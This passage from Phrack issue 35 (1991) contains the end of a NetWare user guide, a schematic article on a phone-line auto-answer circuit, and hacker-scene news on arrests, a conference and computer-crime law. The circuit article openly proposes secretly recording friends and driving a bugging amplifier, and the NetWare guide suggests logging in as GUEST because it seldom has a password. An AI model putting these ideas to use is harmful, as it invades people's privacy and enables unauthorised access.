
6.  Select "Yes" at the confirmation box.

What If...

.... I send commands to print a screen, but it doesn't print?

Did you include the CAPTURE command in your login script?  See a previous
section called "Permanently Set Up Workstation Printing."

.... The application I'm using says that the print job was sent, but it doesn't
print out?

o   Did you use CAPTURE to redirect output to a print queue first?

o   Are the LPT ports captured?  Type

        CAPTURE SH  <Enter>

o   Check PCONSOLE and find the appropriate queue.  If the queue has a long
    list of jobs and none are marked "active," see your print server operator.
    If your job isn't in the queue, the application is not set up properly;
    check with the applications expert.

COMMON ERROR MESSAGES

Error messages point to a software or hardware error that doesn't allow further
processing.  An explanation of the nature of the message and a recommended
course of action follow each message listed below.

"Access denied"

Explanation 1

This message indicates one of the following:

o   You entered your username, your password, or both incorrectly.
o   You tried to log in to a file server on which you are not defined as a
    user.

Action 1

Try to log in again and make sure you type the username and password correctly.
Make sure you are logging in to a file server on which you are defined as a
user or as a member of a group.  You can log in to most file servers as GUEST
because user GUEST seldom requires a password.

Explanation 2

You tried to copy, delete, rename, or modify the file attributes of a file for
which you lack rights.

Action 2

Find out about your rights to this file by typing

    RIGHTS filename  <Enter>

or by asking your supervisor.



"A File Server could not be found"

Explanation

The shell tried to build a connection with the network, but no file server
responded to the request in the given time limit.

Action

Check the cable connection and make sure at least one active file server exists
on the network.  Also ask your supervisor to make sure the IPX file and the
network board have the same configuration.


"Message NOT sent to <servername>/<username> (station number)"

Explanation

If a number of messages have been sent to the user or group and have not been
cleared, either of the following may be true:

o   The workstation's buffer for incoming messages may be full.

o   The message was not sent to the user or group because the user or group
    used the CASTOFF utility.

Action

Send the message later, or try another method of communication.


"Network Error <cause> during <operation>.  File = <drive>:<filename> Abort,
Retry or Fail?" (or "Abort, Retry?")

Explanation 1

The shell called a function call or a DOS interrupt, but the specified
operation could not be performed.  The <drive>:<filename> specify the drive and
filename on which the error condition occurred.

Action 1

Press the R key to retry the operation and, if necessary, repeat this several
times.  If the problem persists, ask your supervisor or look up the specific
message in NetWare v3.11 System Messages.

Explanation 2

Your file server may be down.

Action 2

Press the A key to abort the operation, and then try to connect to the file
server again.  If this attempt fails, contact your supervisor.

"Password has expired"

Explanation

This message indicates your password has expired.

The network supervisor can require users to periodically change their passwords
on the file server to protect the file server from access by unauthorized
persons.  The network supervisor can also assign a number of grace logins
during which users can still use their old passwords (after they have expired)
before having to create new passwords.

Action

Use the SETPASS command to change your password.  If you use the old password
during your remaining grace logins, be sure to change it before you run out of
grace logins, or else your network supervisor has to change it for you.

"Password has expired and grace period has also expired."

Explanation

This message indicates that your user account is locked because your password
has expired and you have used all your grace logins.

After your password expires, you may have a number of grace logins during which
you can still use your old password.  If you do not change your password before
your grace logins are used, you are denied access.

Action

Since you have run out of grace logins, you cannot access your account until
your network supervisor or manager assigns you a new password.

"Server <servername> not found"

Explanation

This message indicates that you tried to attach to the file server
<servername>, but the file server did not respond for one of the following
reasons:

o   You mistyped the name of the file server.
o   You specified a file server not cabled to your network.
o   You specified a file server that is down for system maintenance.

Action

o   Type the file server name correctly.

o   Use the SLIST command to list all the available file servers.

o   If the file server is down for maintenance, try the command later when the
    file server has been brought back up.

If you still have problems, ask your network supervisor for help.

"Unable to attach to server <servername>"

Explanation

This message indicates one of the following:

o   You mistyped the name of the file server.
o   You specified a file server not cabled to your network.
o   You specified a file server that is down for system maintenance.

Action

o   Type the file server name correctly.

o   Use the SLIST command to list all available file servers.

o   If the file server is down for maintenance, try the command later when the
    file server has been brought back up.

If you still have problems, ask your network supervisor for help.

"User <fileserver>/<username> not found"

Explanation

This message indicates that you either specified a user who does not exist on
<fileserver> or mistyped the user's name.

Action

o   Make sure you have typed the user's name correctly.

o   If you are not certain which users are established on the file server, use
    the SYSCON utility to view the list of network users.

o   You can also use the USERLIST command to view a list of currently attached
    users.

(----------------------------------------------------------------------------)

One of the most useful tools that any Novell Network user can have is access to
Netwire on Compuserve.  Netwire is a forum that contains messages, files, and
access to Novell product information firsthand.  You can submit questions to
Novell technicians and hundreds of other Novell users.  A must for any Netware
user.

Another handy tool for those that do have access is the SALVAGE program.
SALVAGE will let you undelete files throughout the system unless the directory
is marked to be purged.  PURGE is nice too because it will allow you to
completely erase any files you created or copied.  To use purge and or salvage
make sure you are mapped to the public directory and execute them from any DOS
prompt.

(----------------------------------------------------------------------------)

As far as dialing up a Novell Network the means are unlimited.  Some have very
tight security systems that only let users with certain hardware dial-in and
others limit the usernames that are allowed dial-in access.
______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 9 of 13

                //////////    //////////////////////////////////////
               //  C   //    //                                  //
              //  r   //    //  A U T O - A N S W E R   I T !   //
             //  e   //    //                                  //
            //  a   //    //////////////////////////////////////
           //  t   //
          //  e   ////////////////////////////////////////////
         //  d     B y :     T w i s t e d   P a i r       //
        ////////////////////////////////////////////////////

     Many times I've wanted to be able to start and/or listen to devices at my
home when I'm somewhere else.  I've developed the following circuits to do this
for me.  The circuits have all kinds of uses.  I'll let your mind ponder the
endless fun activities you can have.  Some of the things I have used them for
are monitoring my own house, tape record my friends for fun without their
knowledge, or listen to a radio station when you're out of town, etc.

                 /////   Automatically Answer a Phone   /////

     This has got to be the best way to automatically answer the phone.  With
just 2 parts, we can couple an audio source into a phone line.  The cost will
be less than $5 no matter where you get the parts!


                       .  .                  Radio Shack
                    .        . / ECG 6412     273-1374 Transformer
Red                __        __  Diac             /
(+)  O-------------I        /I------------) || (---------O  <-
Tip                .       / .            ) || (
                    ._\____/_.             ) || (             Audio Source
                       .  .                ) || (              feeding IN
Green                                      ) || (             to transformer
(-)  O-------------------------------------) || (---------O   <-
Ring

     The "Diac" or "Bilateral Trigger Diode" looks like an open circuit until a
voltage of either polarity is applied that is above its threshold of 63 Volts.
(plus or minus 7 Volts) When this voltage is exceeded, like when the line
rings, the device acts as a switch and goes into conduction.  This "answers"
the phone and holds the line through the transformer, which couples the audio
to the line.

     When the caller hangs up, most telephone companies provide a momentary
reversal of Tip and Ring which causes the Diac to stop conducting and release
the line.

             /////   Another Way to Automatically Answer   /////

     For those who want to really play with this circuit, I suggest the
following additions.  I have added a bridge rectifier and an optical coupler to
the circuit. The bridge just makes sure that the LED inside the optical coupler
gets the proper polarity.  If you are careful to observe polarity when
connecting to Ma Bell, you can leave out the diodes and save a little money.

                                    .   .
                                  .       .                   Radio Shack
     |----------|-----------------__     __---------------|    273-1374
     |          |               .I      /I.              |   Transformer
    ---        ---               ._\____/_.               |--) || (-----O
     /         /                  .  .                     ) || (
    ---        ---                ECG 6412                   ) || (   Audio
 O---|          |                   Diac                     ) || (   Source
Tip  |     O----| 1N4003 Diodes                              ) || (
(+)  |  Ring    |    ( 4 )                                |--) || (-----O
    ---  (-)   ---              ECG 3045  Optical Coupler |
     /         /             ______________    /        |
    ---        ---            |              |            |
     |          |           2 |     | |     | 1          |
     -------------------------------| |------------------|
                              |     |/ |     |
                              |              |
                              |            |
                              |       v v    |
                              |   ________   |
                              |    /        |
                              |   V         |
                              |___|______|___|
                                  |      |
                                4          5

     Pins 4 and 5 on the optical coupler can be wired to remotely start a
device upon answering the line.  An example would be a tape machine or battery-
powered bugging amplifier.  Be careful not to connect anything over 25 volts to
pins 4 and 5 to avoid frying the opto-coupler.  Either circuit will accommodate
an extra LED that could be used as a status indicator.  Just be sure to keep
the polarity proper and put it in series with the other components.

     The Audio Source can be almost ANYTHING.  If you want to hook up a
microphone as the Audio Source, connect the microphone to some kind of
amplifier first, then to the transformer.

           /////   An Interesting Catalog to Read Through   /////

     If you really want to get fancy, you could consider ordering a free
catalog from Monroe Electronics.  They sell the following products you might
wish to play with.  Use these as building blocks to make whatever you need...

   DTMF Decoders  (a) Which provide a momentary or latching relay
   -------------      output for the duration of time the DTMF digit
                      is being pressed.  (If you're really obnoxious,
                      you'd use one of these with one of the above
                      circuits.  Then you could call and randomly turn
                      things on and off like maybe a TV scrambler/
                      jammer.)

                  (b) Which can accept multiple digits and be programmed
                      for a momentary or latching relay output.  (Use one
                      of these to make a DTMF combination lock for your
                      BBS.  Or use as a call screener, i.e. only the
                      correct DTMF sequence could make your phone actually
                      ring)

                  (c) Which can control access by a 4 digit code to latch
                      a relay, then a single digit to unlatch it.  (A
                      little bit more sophisticated than (b) above.

    DTMF Encoders     Which can convert BCD to DTMF tones. Crystal-
    -------------     controlled, of course. 600-ohm audio output.
                      (Use one of these to convert your computer's 
                      output into ANY DTMF tones of your choosing.  You'd
                      be able to choose the duration as well!  Then this
                      circuit would couple your evil DTMF into the phone
                      line)

    Audio Detectors   Detect BUSY and DIAL TONE and operate a relay.
    ---------------   (Useful when making scanning hardware/software
                      applications)  

    Audio Generators  Generate Ring Tone, Dial Tone, Busy Tone, Tone
    ----------------  Burst, etc.  (Start your own phone company.  Fool
                      your friends, trip out the operator)


     Dial-up DTMF remote control systems which can be used to control and
     monitor remote relays and status inputs at unattended sites.
     They can also provide automatic dialing of stored phone numbers to
     report status of inputs, and can make use of an internal timer to
     execute control commands.  (Water strange plants by call-in remote
     control, check moisture levels, see if a certain mailbox is empty
     or full, have the mailbox CALL you when something is delivered,
     etc.  Do I have to tell you everything?  Just get the catalog!)


Their address is:
                    MONROE ELECTRONICS, INC.
                    100 HOUSEL AVENUE
                    LYNDONVILLE  NY  14098
                    (716) 765-2254

////////////////////////- T W I S T E D  P A I R-//////////////////////////
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                 Volume Three, Issue Thirty-five, File 10 of 13

              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN            Issue XXXV / Part One            PWN
              PWN                                             PWN
              PWN            Compiled by Dispater             PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

Welcome to another edition of Phrack World News.  Read this issue very
carefully because it is full of very important stories about a multitude of
different issues.  Special thanks goes to Dark OverLord, Stainless Steel
Provider, and Private Citizen for their help in preparing this issue.
_______________________________________________________________________________

XMASCON 1991
~~~~~~~~~~~
NIA Magazine & Phrack Inc. present:

                           The Second Annual

                             X M A S C O N


Who:  All Hackers, Journalists, Security Personnel, Federal Agents, Lawyers,
      Authors and Other Interested Parties.

Where:                 Houston Airport Hilton Inn
                          500 North Belt East
                         Houston, Texas  77060
                                 U.S.A.
                          Tel: (713) 931-0101
                          Fax: (713) 931-3523

When:      Friday December 27 through Sunday December 29, 1991


Yes, ladies and gentlemen, you read it right... Xmascon has returned! This will
undoubtedly be the telecom event of the year. Unlike certain conferences in the
past, Xmascon 91 has a devoted and dedicated staff who are putting in an
unmentionable amount of time to ensure a large, vast and organized collection
of some of the most diversified people in the telecommunications world. The
event will be open to the public so that anyone may attend and learn more about
the different aspects of computer security.


                           Hotel Information
                           -----------------

The Houston Airport Hilton Inn is located about 6 miles from Intercontinental
Airport. The Xmascon group room rates are $49.00 plus tax (15%) per night, your
choice of either single or double. There are also 7 suites available, the
prices of which vary from $140 to $250. You can call the hotel to find out the
differences and availability of the suites, and you will also NEED to tell them
you are with the Xmascon Conference to receive the reduced room rate,
otherwise, you will be paying $69.00. There is no charge for children,
regardless of age, when they occupy the same room as their parents.  Specially
designed rooms for the handicapped are available. The hotel provides free
transportation to and from the airport, as well as neighboring Greenspoint
Mall, every 30 minutes on the hour, and on call, if needed. There are 2
restaurants in the hotel. The Wicker Works is open until 11:00 pm, and The
Forty Love is open 24 Hours. There will also be breakfast, lunch and dinner
buffets each day. There is a piano bar, The Cycle Club, as well as a sports
bar, Chaps, which features numerous table games, large screen TV, and a disco
with a DJ.  Within the hotel compound, there are 3 pools, 2 of which are
indoors, a jacuzzi, a miniature golf course, and a fully equipped health club
which features universal weights, a whirlpool and sauna.  A car rental agency
is located in the hotel lobby, and you can arrange to pick your car up at
either the airport or the hotel. Xmascon attendees are entitled to a discounted
rate. Contact the hotel for more information.

Xmascon will last 3 days, with the main conference being held on Saturday,
December 28, in the Osage meeting room, starting at 12:00 p.m. and continuing
on throughout the evening. This year, we have our own complete wing of the
hotel, which is housed around a 3,000 square foot atrium ballroom. The wing
is completely separated from the rest of the hotel, so we are strongly
encouraging people to make their reservations as far in advance as possible
to ensure themselves a room within our area.

We are hoping to have a number of people speak on a varied assortment of
topics. If you would like to speak, please contact us as soon as possible and
let us know who you are, who you represent (if anyone), the topic you wish to
speak on, a rough estimate of how long you will need, and whether or not you
will be needing any audio-visual aids.

There will be a display case inside the meeting room which will hold items of
telecom interest. Specific items that will be available, or that we hope to
have, include the first issues of 2600, Tap, Mondo 2000, and other magazines,
non-computer related magazines that feature articles of interest, a wide array
of boxes, the Quaker Oats 2600 mhz whistle, The Metal AE, etc. We will also
have a VCR and monitor set up, so if you have any interesting videos (such as
the Unsolved Mysteries show featuring Kevin Poulsen), or if you have anything
you think people would enjoy having the chance to see, please let us know ahead
of time, and tell us if you will need any help getting it to the conference.
If all else fails, just bring it to the con and give it to us when you arrive.

If anyone requires any additional information, needs to ask any questions,
wants to RSVP, or would like to be added to the mailing list to receive the
Xmascon updates, you may write to either myself (Drunkfux), Judge Dredd, or
Lord Macduff via Internet at:

                          nia@nuchat.sccsi.com

Or via US Mail at:

                         Hard Data Corporation
                               ATTN: HoHo
                             P.O. Box 60695
                         Airport Mail Facility
                      Houston, Texas  77205-9998
                                 U.S.A.

We will hopefully have an 800 mailbox before the next update is sent out.  If
someone cares to donate a decent one, that will stay up throughout the end of
the year, please let us know. We should also be listing a few systems as an
alternative form of reaching us.

Xmascon 91 will be a priceless learning experience for professionals, and gives
journalists a chance to gather information and ideas direct from the source. It
is also one of the very few times when all the members of the computer
underground can come together for a realistic purpose. We urge people not to
miss out on an event of this caliber, which doesn't happen very often. If
you've ever wanted to meet some of the most famous people from the hacking
community, this may be your one and only chance. Don't wait to read about it in
all the magazines, and then wish you had attended, make your plans to be there
now! Be a part of our largest and greatest conference ever.

Remember, to make your reservations, call (713) 931-0101 and tell them you're
with Xmascon.

In closing...  if you miss this one, you're only cheating yourself.
_______________________________________________________________________________

MindRape Revisited                                           September 27,1991
~~~~~~~~~~~~~~~~~
>From Arizona State University State Press
Further Reading:  Phrack Issue 34, File 11, "MindRape or MediaRape?"

     An Arizona State University (ASU) student is one of seven suspects in a
computer fraud scheme that one US West Communications official said could cost
the carrier and the phone company as much as $5 billion in one year.

     Police in Phoenix, Arizona have seized computer equipment, software, and a
list of long distance calling card codes from the home of the unidentified
19-year-old student.

     The student is one of seven people -- three in Oregon and one each in
Washington, Utah, and Iowa -- singled out as suspects in a month-long
investigation of electronic phone fraud conducted by Phoenix police, said Jim
Waltman, a fraud manager for US West Communications.  The Phoenix man has not
been arrested.

    The computer "hackers" allegedly used their computers to gain access to
secret long distance phone access codes such as the ones found on calling
cards, and sold codes to other students for profit.

    US West officials told the Associated Press that it is unknown how many
local customers have been wrongfully billed for long distance calls on their
accounts.

    Kevin Robinson, public information sergeant for the Phoenix Police
Department, would not comment on the investigation.

    Art Carter, dean of Student Life at Arizona State University (ASU), said
that if the student is charged, the case will be reviewed under the ASU Code of
Conduct and the action taken by the University will be determined at that time.

    Mark Knighton, security director for LDL Long Distance, said his company
and US West were able to trace calls to several location, including the home of
the Phoenix man.

    The Phoenix man has not been arrested, authorities said.

    Waltman said he was with Phoenix police a week ago when they searched the
north Phoenix home and uncovered what turned out to be an inexpensive and
relatively simple system for getting free codes.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Editor's Comment by: Dispater

     What MindRape has been charged with cannot be determined now.  A request
must be submitted to Arizona Public Records and be considered for release to
the requestor.

Here are some possibly useful numbers:

Arizona Special Investigations Division (602)542-4853
County Attorney's Office                (602)262-3411      (Gail Thackeray)
Arizona Republic Newspaper              (602)271-8000
Phoenix Police Department
- General Investigations                (602)262-6141
- Police Information                    (602)262-7626
- Police Records                        (602)262-6134
_______________________________________________________________________________

East Coast LOD Hackers Create Virtual Reality MAELSTROM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         "It's reached the point where hacking is counter-productive."

If the 1980's were the decade that hackers emerged from their relative
obscurity as computer oddities, to be transformed in the public's perception as
front-page news -- then the 90's are shaping up to be the decade of hacker
turned entrepreneur.  Lately the notorious hacker group Legion of Doom seems to
be a particularly fertile spawning ground for ex-hackers turned
young-businessman.

Two former East-Coast Legion of Doom members, Bruce Fanscher <Dead Lord> and
Patrick Krupa <Lord Digital>, have pooled their talents to form a new company
in the burgeoning field of Virtual Reality.

The arena of Virtual Reality has often been called technology in search of a
purpose and at times resembles nothing more than an interactive movie meets
videogame.  This chaotic state of affairs has led to a never-never land of
incompatible technologies and far-out ideas, that have tremendous potential,
but little commercial application at present.  Fanscher and Krupa plan to
change all that.  "VR isn't anything new, it's something we've been living for
over half our lives.  The only difference is the state of current technology,
makes possible an incredible variety of application." said Krupa in an
interview.  "Right now we're in the ideal position to move forward on ideas
we've been working on for years," added Fanscher.

Krupa, who had attained the status of cult figure in the hacker underground
prior to his arrest, as chronicled by John Markoff (New York Times) technology
columnist, has spent the last several years working in the very lo-tech world
of theater, "Basically I was totally burnt out on computers.  I mean I don't
give a damn if my word processor boots in one second instead of eight, and
that's the only place anything was heading for a long time.  The NeXT has
changed all that and brought to market something truly innovative, although I
still don't care too much about technology as anything but a medium through
which you can reach people and affect their experiences and perceptions."

No stranger to creative innovation himself, Fanscher, Krupa's longtime
compatriot, has spent his share of time in the somewhat murky spotlight of the
hacker underground.  Musing about his days as a hacker delving into computer
systems to see how they worked, Fanscher remarked that:

     "It's reached the point where hacking is counter-productive.  You can
     only take apart things other people have designed and see what makes
     them work, for so long, before it becomes an exercise in boredom and
     the time comes to use what you've learned to create something new
     that nobody has ever seen before.  My current interest in other
     people's systems is zero.  It was a useful learning experience for me,
     but there's no future in it."

This oddly charismatic, dynamic duo is rounded out by Delia Kopold a former
actress and theater major who is the architect of the worlds that make
MAELSTROM come alive.  This initial offering by the collection of talents will
be an online system run on the NeXTcube supermicro -- a machine that looks more
like a piece of modern art than a computer -- that offers enhanced versions of
all the usual amenities like electronic messaging, file transfers, and
networking, all revolving around MAELSTROM, a program Fanscher calls, "a
real-time virtual interaction simulation engine."  MAELSTROM will initially
take the form of an extremely detailed fantasy world complete with custom
graphic programs that run on MS-DOS, Macintosh and Amiga computers, allowing
users to tap into the NeXTcube's system architecture through their home
computers connected to telephone lines.  "Maelstrom isn't really a fantasy
game, it's actually a universal engine comprised of objects that can be
accessed by a variety of graphic, sound and data files to create just about any
multi-user reality you can dream up," explains Krupa.

The MAELSTROM system is about to go through a short beta-test run in New York
City prior to a national ad campaign that will herald its universal
accessibility on packet switch.  "Our beta system already offers everything
that competing services offer, but at a much lower cost -- and we're still
adding features.  And nothing like Maelstrom has ever existed before, the
technology just wasn't there," concludes Fanscher.
_______________________________________________________________________________

2600 Magazine Exposes Security Holes                           October 18,1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by John F. McMullen & Barbara E. McMullen (Newbytes)

Armonk, New York -- Supported by videotape examples, Emmanuel Goldstein, editor
and publisher of 2600 Magazine: The Hacker Quarterly, told those in attendance
at an October 17th New York City press conference that "the American public is
often lulled into a false sense of security; a security that is often not
supported by the facts of specific cases."

The videotapes, produced by 2600 and provided to the press show both the
intrusion of a Dutch "hacker" in to United States Military computers and what
Goldstein alleges is the fallibility of a brand of mechanical, pushbutton locks
used by, among others, New York State University sites, Federal Express, United
Parcel Service, JFK International Airport, IBM and NASA.

Goldstein told Newsbytes "We invested considerable time and money to wake
people up to the fact that we have a false sense of security when it comes not
only to computer networks but to physical safety as well."

The tape of the Dutch "hacker" was made by Goldstein while in Europe. and shows
the intrusion into a Unites States Army computer system.  The intruder was able
to set up a fictitious account called "danquayle" and, once into the system,
was able to obtain "root" privileges thus giving him total control of the
workings of the system.

A portion of this tape had previously been shown with Goldstein's approval on
an episode of the Geraldo Rivera television show "Now It Can Be Told".
Goldstein told Newsbytes that one^S^Q reason for his release of the entire tape to
the press was his feeling that the Rivera episode entitled "The Mad Hacker's
Key Party" had distorted the message of the tape -- "This was not a case of a
terrorist break-in but was rather simply a demonstration of the lack of
security of our systems.  To find root accounts with password like "Kuwait" and
lack of sophisticated security in our military computers should be of real
concern and should not be lost in an exploitation of the 'hacker' issue."

A background paper provided at the conference by 2600 explains the entire
intrusion effort in detail and states "The purpose of this demonstration is to
show just how easy it really was.  Great care was taken to ensure that no
damage or alteration of data occurred on this particular system.  No military
secrets were taken and no files were saved to a disk by the hackers.  What is
frightening is that nobody knows who else has access to this information or
what their motivations might be.  This is a warning that cannot be taken
lightly."

The second videotape show Goldstein and other 2600 staff opening seemingly at
will locks manufactured by Simplex Security Systems.  The locks of the
mechanical pushbutton combination variety were shown to be installed at the
State of New York University at Stony Brook, JFK International Airport and on
Federal Express and United Parcel pick-up boxes throughout the New York
Metropolitan area.

In the film, Goldstein is shown filling out a Federal Express envelope for
delivery to 2600 Magazine and inserting in the Fedex dropbox.  He then lifts
the weather protection cover on the box's lock and keys a combination that
allows him to open the lock and remove his envelope.  Scott Skinner, a SUNY
student and 2600 staff member told Newsbytes that it had actually taken the
staff 10 minutes to determine the proper code combinations to open the lock.

Skinner explained, "While Simplex prefers people to think that there is an
endless number of permutations to the lock, there are actually only 1,085.  In
most cases, even this number is greatly reduced -- if one knows that only three
buttons are being used, it reduces the possibilities to 135.  Additionally, we
found that, once we had the combination to one Federal Express dropbox, it
worked in every other one that we tried in the New York area."

Goldstein told Newsbytes "When we contacted Simplex, they first denied that the
locks were unsafe and then said that the permutations were much greater.  After
some discussion, they admitted that the 1,085 figure was correct but said that
it would take a person with a complete listing of the combinations over four
hours to try them all. Our experience obviously shows that they may be opened
in a much shorter time than that."

Goldstein also pointed out that, "although a $5 Master combination lock may be
broken by a crowbar, it is a much more secure combination device.  It has
64,000 combinations compared to the 1,085 with the Simplex."

Goldstein continued, "One of the real problems is that, should a person have
the misfortune to be robbed, entry due to a failure of the Simplex lock gives
no evidence of a forcible break-in and police and insurance companies often put
the blame on the homeowner or office manager for 'giving away the combination.'
It really can create a problem."

Skinner told Newsbytes "I'm really concerned about t^Shis.  I'm a student at
SUNY, Stony Brook and all our dormitories use these locks as the only means of
security.  I've shown the problem to Scott Law who is responsible for residence
security but he has discounted the problem and said that the locks were
installed at the recommendation of the campus locksmith.  The locksmith, Garry
Lenox contradicts Law and says that he recommended against these locks years
ago and said that they were not secure for dormitory use."  Skinner said that
he will write an article for the college newspaper in an attempt to raise
consciousness about this problem.

Goldstein also said that he intends to publish the list of valid combinations
in an up-coming iss^Que of 2600 to demonstrate to the public the problems with
the lock.  He further said that he will raise the issue on his weekly radio
show, "Off The Hook", heard on New York's WBAI-FM.

In response to a Newsbytes question concerning how the 2600 staff happened to
become involved in a problem with locks, Goldstein said, "We're hackers and
when we see something with buttons on it, whether it's a computer or not, we
tend to try it.  While the average person tends to accept that things are
secure just because he is told that they are, hackers will usually try them
out.  It's because of this 'trying out' that we can point out the problems with
both the US military computer security and this lock -- and we feel that, in
both cases, we have performed a service. People should be aware when they are
at risk so that they may take action to correct it."
_______________________________________________________________________________
 
Questions Exist On Israeli Break-In Of US Systems            September 10,1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Barbara E. McMullen & John F. McMullen (Newsbytes)

NEW YORK -- Amidst reports of the intrusion by an Israeli national into United
States military computer systems, there have been conflicting accounts of the
extent and nature of the invasion.

According to wire services, Deri Schriebman, an 18 year-old graduate of
Israel's Technion Institute and a native of the northern Israeli city of
Carmiel, was arrested by Israeli police for allegedly breaking into US military
computers and commercial credit card systems.  Israeli spokes person Eitan Raz,
commenting on the equipment found at Schriebman's home for allegedly making
free overseas phone calls, was quoted as saying "This was a very complex
system. It was the first time such technology was discovered in Israel."

Newsbytes has ben able to confirm with sources that a trail of credit card
fraud in the United States and Canada led investigators to Schriebman but has
not been able to confirm that Schriebman, as reported in Israeli press, was
able to access classified Pentagon information concerning Patriot missiles
during the recent Gulf War.  A US government investigative official told
Newsbytes that, while his agency has formally requested documentation of the
events from the Israeli police, that there seems to have been no contact to
date between any US service and the Israeli investigators.

Other investigative sources have told Newsbytes that the investigation into
Schriebman's activities began in May 1991 when two Quebec teenagers were
arrested for purchasing goods through the use of stolen credit card
identification.  The teenagers told Canadian authorities that they had received
the information from a source in Carmiel, Israel and the authorities notified
Israeli police.  According to the Israeli reports, Schriebman admitted the
intrusion into credit card files and the subsequent dissemination of codes but
denied making any use of the information. He was quoted as saying that his
cracking into the systems was done only out of curiosity.

A "hacker" source told Newsbytes that underground bulletin boards utilized for
the exchange of such credit information are often frequented by foreign
nationals. He said that the most frequent visitors come from Australia, Israel
and Germany and that many of the Israelis identify themselves as have a
connection with the Technion Institute.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                 Volume Three, Issue Thirty-five, File 11 of 13

              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN            Issue XXXV / Part Two            PWN
              PWN                                             PWN
              PWN            Compiled by Dispater             PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

Justice Revs Up Battle On Computer Crime                        October 7, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Michael Alexander (ComputerWorld)(Page 4)

Washington D.C. -- The nation's top federal computer crime law enforcers
announced plans to escalate the war on computer crime.

At the federal government's 14th National Computer Security Conference held in
Washington D.C., officials at the U.S. Department of Justice said the
department is launching a computer crime unit that will be charged with
prosecuting crimes and pushing for stiffer penalties for convicted computer
outlaws.

"Computer crime is on the rise, and the Justice Department is taking this area
very seriously -- as well as the FBI, U.S. Secret Service, and the military,"
said Mary Spearing, chief of general litigation and legal advice in the
criminal division at the Justice Department.

The new crime unit will also advocate closing loopholes in the government's
computer crime statute.  The Computer Fraud & Abuse Act of 1986 "is outmoded
and outdated," said Scott Charney, a computer crime prosecutor and chief of the
new computer crime unit.

The Justice Department wants to amend the law with a provision that would make
inserting a virus or worm into a computer system a crime, Charney said.

Those convicted of computer crimes will more often be sentenced according to
federal guidelines rather than on recommendation of prosecutors, who may ask
for lighter penalties, said Mark Rasch, the government's attorney who
prosecuted Robert Morris in the infamous Internet worm case.

A new Justice Department policy now mandates that all defendants will be
treated equally, without regard for personal history or other factors that
might mitigate stiffer sentences, Rasch said.

"The penalties for computer crime will become increasingly more severe,"
predicted Kent Alexander, assistant U.S. attorney in Atlanta <prosecutor of the
Atlanta members of the Legion of Doom>.  "In five years, they are going to look
back and think a year in jail was a light sentence."

The FBI is "staffing up to address concerns about computer crimes" and
increasing its training efforts, said Mike Gibbons, FBI supervisory special
agent <who worked on both the Morris and the Clifford Stoll KGB hackers
cases>.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Supreme Court Refuses Morris Appeal                            October 14, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Michael Alexander (ComputerWorld)(Page 14)

Washington, D.C. -- The U.S. Supreme Court refused without comment to hear
Robert T. Morris' appeal last week, ending a legal journey that began nearly
three years ago when he injected a worm into the Internet network.

While the trek is over for Morris, there remain serious questions about the
Computer Fraud and Abuse Act of 1986, the statute under which he was
prosecuted.

The refusal to review the Morris case leave intact a "bone breaker" law that
could transform otherwise law-abiding computer users in felons and inhibit the
creative uses of computer technology according to Thomas Viles, an attorney at
the Silverglate & Good law firm in Boston.  Viles authored a friend of the
court brief in the Morris appeal on behalf of the Electronic Frontier
Foundation.

Some legal experts worry that computer users who enter a computer system
without authorization, either unwittingly or with the intention of merely
looking around, could be given penalties that are overly severe.

"A single computer entry is of an entirely different order than the destruction
of data or the intentional alteration of data, just as simple trespass is
pretty minor stuff compared to vandalism or burglary," Viles said.  "Now if
people whose livelihoods depend on computers get into somebody else's computer
without authorization, they could be in Leavenworth for five years."

The Morris appeal boiled down to the critical question of whether he intended
to cause the harm that ensued after he set loose his ill-conceived computer
program on November 2, 1988.

In 1990, a federal judge in Syracuse, New York ruled that it was not necessary
for the government to prove that Morris intended to cause harm, only that
Morris intended to access computers with authorization or to exceed
authorization that he may have had.  Earlier this year a federal appeals court
upheld Morris' May 1990 conviction under which he received three years
probation, a $10,000 fine, and 400 hours of community service.

That affirmation goes against the widely accepted tenet that an injury can
amount to a crime only when deliberately intended, Viles said.  "The law
distinguishes, say, between murder and manslaughter.  You can't be guilty of
murder if the killing was utterly accidental and unintended."

A General Accounting Office (GAO) report released in 1989 noted other flaws in
the federal computer statute.  While the law makes it a felony to access a
computer without authorization, the law does not define what is meant by
"access" or "authorization," the GAO reported.

UPDATING THE LAW

U.S. Department of Justice Officials recently acknowledged that the Computer
Fraud and Abuse Act is outdated and noted that it should be refined <see
Justice Revs Up Battle On Computer Crime (the previous article)>.  Scott
Charney, chief of the Justice Department's newly created computer crime unit,
said the department will lobby to fortify the law with provisions that would
outlaw releasing viruses and worms and make it a felony to access a computer
without authorization and cause damage through reckless behavior.

Trespassing into a computer is more serious than it may appear at first
glance, Charney said.  "It is not easy to determine what happened, whether
there was damage, how safe the system now is or what the intruder's motives
were."

Some legal experts said they believe the law is already overly broad and do not
advocate expanding it with new provisions.  "It is a far-reaching law, whose
boundaries are still not known," said Marc Rotenberg, an attorney and director
of the Washington, D.C. office of Computer Professionals for Social
Responsibility.  "The way I read the law is, the Justice Department has
everything it needs and more," he said.  "After the Morris decisions, if you
sneeze, you could be indicted."

The Morris case pointed out deficiencies in the law that have resulted from
